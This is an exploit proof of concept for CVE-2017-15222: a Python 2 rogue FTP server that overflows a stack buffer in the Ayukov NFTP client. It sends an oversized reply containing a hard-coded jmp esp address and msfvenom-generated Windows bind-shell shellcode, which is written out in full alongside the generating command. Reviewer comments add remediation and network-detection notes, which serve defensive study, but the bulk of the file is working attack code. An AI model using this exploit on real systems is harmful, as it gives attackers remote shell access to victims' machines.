# Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow
# Date: 2018-12-29
# Exploit Author: Uday Mittal
# Vendor Homepage: http://www.ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/src/nftp-1.72.zip
# Version : below 2.0
# Tested on: Microsoft Windows XP SP3
# CVE: CVE-2017-15222
# EIP Location: 4116
# Buffer starts from : 4121
# 0x7e45b310 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
# badchars: '\x00\x0A\x0D\x40'
# Shellcode: msfvenom -p windows/shell_bind_tcp RHOST=192.168.43.72 LPORT=4444 -b '\x00\x0A\x0D' -f python
#
# Reviewer summary (defensive reading of this PoC):
#   - The vulnerable party is the FTP *client*. This script is a rogue FTP
#     server: it accepts a connection, plays a minimal login exchange, and
#     answers the client's next command with a single oversized reply line
#     that overflows a stack buffer in the client.
#   - Exposure therefore requires the client to connect to an
#     attacker-controlled (or compromised) server. Per the header, versions
#     below 2.0 are affected; the remediation is moving to a fixed version.
#   - Network detection is straightforward: a single FTP control-channel
#     reply of roughly 15 KB (4116 + 4 + 100 + shellcode + 10425 bytes, see
#     `evil` below) is far outside anything a legitimate server emits.
#   - The hard-coded return address relies on a USER32.dll without ASLR on
#     XP SP3 (header: "ASLR: False"); per the header this was only tested
#     there, so the listed address is not expected to hold elsewhere.
#   - Syntax note: `print conn.recv(1024)` is a Python 2 print statement,
#     so this script as written runs under Python 2 only.
import socket

# Address/port the fake FTP server listens on (port 21 = FTP control channel).
IP = '192.168.43.28'
port = 21

# msfvenom-generated payload from the command in the header (bind shell,
# encoded to avoid the listed bad characters).
buf = ""
buf += "\xbb\x04\x8b\xfc\xf1\xd9\xc4\xd9\x74\x24\xf4\x5a\x29"
buf += "\xc9\xb1\x53\x83\xea\xfc\x31\x5a\x0e\x03\x5e\x85\x1e"
buf += "\x04\xa2\x71\x5c\xe7\x5a\x82\x01\x61\xbf\xb3\x01\x15"
buf += "\xb4\xe4\xb1\x5d\x98\x08\x39\x33\x08\x9a\x4f\x9c\x3f"
buf += "\x2b\xe5\xfa\x0e\xac\x56\x3e\x11\x2e\xa5\x13\xf1\x0f"
buf += "\x66\x66\xf0\x48\x9b\x8b\xa0\x01\xd7\x3e\x54\x25\xad"
buf += "\x82\xdf\x75\x23\x83\x3c\xcd\x42\xa2\x93\x45\x1d\x64"
buf += "\x12\x89\x15\x2d\x0c\xce\x10\xe7\xa7\x24\xee\xf6\x61"
buf += "\x75\x0f\x54\x4c\xb9\xe2\xa4\x89\x7e\x1d\xd3\xe3\x7c"
buf += "\xa0\xe4\x30\xfe\x7e\x60\xa2\x58\xf4\xd2\x0e\x58\xd9"
buf += "\x85\xc5\x56\x96\xc2\x81\x7a\x29\x06\xba\x87\xa2\xa9"
buf += "\x6c\x0e\xf0\x8d\xa8\x4a\xa2\xac\xe9\x36\x05\xd0\xe9"
buf += "\x98\xfa\x74\x62\x34\xee\x04\x29\x51\xc3\x24\xd1\xa1"
buf += "\x4b\x3e\xa2\x93\xd4\x94\x2c\x98\x9d\x32\xab\xdf\xb7"
buf += "\x83\x23\x1e\x38\xf4\x6a\xe5\x6c\xa4\x04\xcc\x0c\x2f"
buf += "\xd4\xf1\xd8\xda\xdc\x54\xb3\xf8\x21\x26\x63\xbd\x89"
buf += "\xcf\x69\x32\xf6\xf0\x91\x98\x9f\x99\x6f\x23\x8e\x05"
buf += "\xf9\xc5\xda\xa5\xaf\x5e\x72\x04\x94\x56\xe5\x77\xfe"
buf += "\xce\x81\x30\xe8\xc9\xae\xc0\x3e\x7e\x38\x4b\x2d\xba"
buf += "\x59\x4c\x78\xea\x0e\xdb\xf6\x7b\x7d\x7d\x06\x56\x15"
buf += "\x1e\x95\x3d\xe5\x69\x86\xe9\xb2\x3e\x78\xe0\x56\xd3"
buf += "\x23\x5a\x44\x2e\xb5\xa5\xcc\xf5\x06\x2b\xcd\x78\x32"
buf += "\x0f\xdd\x44\xbb\x0b\x89\x18\xea\xc5\x67\xdf\x44\xa4"
buf += "\xd1\x89\x3b\x6e\xb5\x4c\x70\xb1\xc3\x50\x5d\x47\x2b"
buf += "\xe0\x08\x1e\x54\xcd\xdc\x96\x2d\x33\x7d\x58\xe4\xf7"
buf += "\x8d\x13\xa4\x5e\x06\xfa\x3d\xe3\x4b\xfd\xe8\x20\x72"
buf += "\x7e\x18\xd9\x81\x9e\x69\xdc\xce\x18\x82\xac\x5f\xcd"
buf += "\xa4\x03\x5f\xc4"

# The malicious reply line. Layout, matching the header's offsets:
#   "A"*4116            filler up to the saved return address ("EIP Location: 4116")
#   "\x10\xb3\x45\x7e"  0x7e45b310 little-endian (the USER32.dll jmp esp above)
#   "\x90"*100          NOP sled
#   buf                 the payload
#   "D"*10425           trailing padding
# Total is about 15 KB in one reply line -- the detection signature noted above.
evil = "A"*4116 + "\x10\xb3\x45\x7e" + "\x90"*100 + buf + "D"*10425

# Stand up the listening socket.
# NOTE(review): the bare except only prints on failure; control still falls
# through to the accept loop below with a socket that was never bound/listened.
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((IP, port))
    s.listen(20)
    print("[i] FTP Server started on port: "+str(port)+"\r\n")
except:
    print("[!] Failed to bind the server to port: "+str(port)+"\r\n")

# Serve each connecting client: banner, then the standard FTP login replies
# (331 "need password", 230 "logged in") in response to whatever the client
# sends, then the oversized `evil` line as the reply to the client's next
# command. Each recv() is echoed to stdout so the client's commands are visible.
while True:
    conn, addr = s.accept()
    conn.send('220 Welcome!' + '\r\n')
    print conn.recv(1024)
    conn.send('331 OK.\r\n')
    print conn.recv(1024)
    conn.send('230 OK.\r\n')
    print conn.recv(1024)
    # The overflowing reply goes out here, after the client is "logged in".
    conn.send(evil + '\r\n')
    print conn.recv(1024)
    conn.send('257' + '\r\n')